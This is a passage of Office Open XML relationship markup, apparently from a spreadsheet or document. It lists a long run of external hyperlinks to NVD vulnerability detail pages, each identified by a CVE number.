Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79376" TargetMode="External" Id="rId996" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79423" TargetMode="External" Id="rId997" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79602" TargetMode="External" Id="rId998" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79742" TargetMode="External" Id="rId999" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79744" TargetMode="External" Id="rId1000" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80074" TargetMode="External" Id="rId1001" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80077" TargetMode="External" Id="rId1002" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80080" TargetMode="External" Id="rId1003" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80081" TargetMode="External" Id="rId1004" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80083" TargetMode="External" Id="rId1005" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80085" TargetMode="External" Id="rId1006" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80096" TargetMode="External" Id="rId1007" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80099" TargetMode="External" Id="rId1008" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80130" TargetMode="External" Id="rId1009" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80465" TargetMode="External" Id="rId1010" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80914" TargetMode="External" Id="rId1011" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80921" TargetMode="External" Id="rId1012" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81211" TargetMode="External" Id="rId1013" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81352" TargetMode="External" Id="rId1014" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81385" TargetMode="External" Id="rId1015" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81543" TargetMode="External" Id="rId1016" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81550" TargetMode="External" Id="rId1017" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81551" TargetMode="External" Id="rId1018" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81554" TargetMode="External" Id="rId1019" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81940" TargetMode="External" Id="rId1020" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81941" TargetMode="External" Id="rId1021" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81952" TargetMode="External" Id="rId1022" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81955" TargetMode="External" Id="rId1023" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81996" TargetMode="External" Id="rId1024" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82089" TargetMode="External" Id="rId1025" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82092" TargetMode="External" Id="rId1026" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82095" TargetMode="External" Id="rId1027" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82097" TargetMode="External" Id="rId1028" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82098" TargetMode="External" Id="rId1029" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82099" TargetMode="External" Id="rId1030" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82641" TargetMode="External" Id="rId1031" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83992" TargetMode="External" Id="rId1032" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83996" TargetMode="External" Id="rId1033" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83998" TargetMode="External" Id="rId1034" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84187" TargetMode="External" Id="rId1035" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84889" TargetMode="External" Id="rId1036" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85049" TargetMode="External" Id="rId1037" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85051" TargetMode="External" Id="rId1038" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85053" TargetMode="External" Id="rId1039" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85094" TargetMode="External" Id="rId1040" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85228" TargetMode="External" Id="rId1041" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85430" TargetMode="External" Id="rId1042" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85432" TargetMode="External" Id="rId1043" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85455" TargetMode="External" Id="rId1044" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85677" TargetMode="External" Id="rId1045" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85684" TargetMode="External" Id="rId1046" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85877" TargetMode="External" Id="rId1047" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86099" TargetMode="External" Id="rId1048" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86404" TargetMode="External" Id="rId1049" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86482" TargetMode="External" Id="rId1050" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86542" TargetMode="External" Id="rId1051" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86775" TargetMode="External" Id="rId1052" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87430" TargetMode="External" Id="rId1053" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87433" TargetMode="External" Id="rId1054" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87440" TargetMode="External" Id="rId1055" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87444" TargetMode="External" Id="rId1056" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87460" TargetMode="External" Id="rId1057" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87489" TargetMode="External" Id="rId1058" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87536" TargetMode="External" Id="rId1059" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87542" TargetMode="External" Id="rId1060" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87569" TargetMode="External" Id="rId1061" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87570" TargetMode="External" Id="rId1062" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87579" TargetMode="External" Id="rId1063" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87585" TargetMode="External" Id="rId1064" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87587" TargetMode="External" Id="rId1065" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87588" TargetMode="External" Id="rId1066" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87612" TargetMode="External" Id="rId1067" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87617" TargetMode="External" Id="rId1068" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87625" TargetMode="External" Id="rId1069" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87636" TargetMode="External" Id="rId1070" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87766" TargetMode="External" Id="rId1071" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87795" TargetMode="External" Id="rId1072" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87823" TargetMode="External" Id="rId1073" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87927" TargetMode="External" Id="rId1074" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88009" TargetMode="External" Id="rId1075" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88271" TargetMode="External" Id="rId1076" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88277" TargetMode="External" Id="rId1077" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89046" TargetMode="External" Id="rId1078" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2016-20097" TargetMode="External" Id="rId1079" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2019-25765" TargetMode="External" Id="rId1080" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2019-25766" TargetMode="External" Id="rId1081" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2020-37267" TargetMode="External" Id="rId1082" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-50997" TargetMode="External" Id="rId1083" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-51009" TargetMode="External" Id="rId1084" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-51017" TargetMode="External" Id="rId1085" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54355" TargetMode="External" Id="rId1086" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54390" TargetMode="External" Id="rId1087" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54393" TargetMode="External" Id="rId1088" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-58374" TargetMode="External" Id="rId1089" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-58375" TargetMode="External" Id="rId1090" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-58381" TargetMode="External" Id="rId1091" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-58382" TargetMode="External" Id="rId1092" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-34115" TargetMode="External" Id="rId1093" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0799" TargetMode="External" Id="rId1094" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10143" TargetMode="External" Id="rId1095" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12143" TargetMode="External" Id="rId1096" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12562" TargetMode="External" Id="rId1097" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12611" TargetMode="External" Id="rId1098" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14297" TargetMode="External" Id="rId1099" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16174" TargetMode="External" Id="rId1100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18608" TargetMode="External" Id="rId1101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19204" TargetMode="External" Id="rId1102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19486" TargetMode="External" Id="rId1103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21042" TargetMode="External" Id="rId1104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-23921" TargetMode="External" Id="rId1105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-29063" TargetMode="External" Id="rId1106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33197" TargetMode="External" Id="rId1107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33871" TargetMode="External" Id="rId1108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-3505" TargetMode="External" Id="rId1109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-35469" TargetMode="External" Id="rId1110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40192" TargetMode="External" Id="rId1111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40877" TargetMode="External" Id="rId1112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41453" TargetMode="External" Id="rId1113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41674" TargetMode="External" Id="rId1114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44494" TargetMode="External" Id="rId1115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45084" TargetMode="External" Id="rId1116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45115" TargetMode="External" Id="rId1117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45116" TargetMode="External" Id="rId1118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45273" TargetMode="External" Id="rId1119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45809" TargetMode="External" Id="rId1120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46334" TargetMode="External" Id="rId1121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46382" TargetMode="External" Id="rId1122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46384" TargetMode="External" Id="rId1123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46385" TargetMode="External" Id="rId1124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46636" TargetMode="External" Id="rId1125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47659" TargetMode="External" Id="rId1126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47660" TargetMode="External" Id="rId1127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47661" TargetMode="External" Id="rId1128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47662" TargetMode="External" Id="rId1129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47663" TargetMode="External" Id="rId1130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47665" TargetMode="External" Id="rId1131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47683" TargetMode="External" Id="rId1132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47879" TargetMode="External" Id="rId1133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48006" TargetMode="External" Id="rId1134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48026" TargetMode="External" Id="rId1135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48059" TargetMode="External" Id="rId1136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48813" TargetMode="External" Id="rId1137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49478" TargetMode="External" Id="rId1138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52736" TargetMode="External" Id="rId1139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53453" TargetMode="External" Id="rId1140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53502" TargetMode="External" Id="rId1141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53530" TargetMode="External" Id="rId1142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53758" TargetMode="External" Id="rId1143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53924" TargetMode="External" Id="rId1144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54347" TargetMode="External" Id="rId1145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54722" TargetMode="External" Id="rId1146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54729" TargetMode="External" Id="rId1147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55100" TargetMode="External" Id="rId1148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55191" TargetMode="External" Id="rId1149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55193" TargetMode="External" Id="rId1150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55194" TargetMode="External" Id="rId1151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55245" TargetMode="External" Id="rId1152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55250" TargetMode="External" Id="rId1153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55763" TargetMode="External" Id="rId1154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55764" TargetMode="External" Id="rId1155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55768" TargetMode="External" Id="rId1156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56718" TargetMode="External" Id="rId1157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57445" TargetMode="External" Id="rId1158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59643" TargetMode="External" Id="rId1159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61556" TargetMode="External" Id="rId1160" /><Relationship 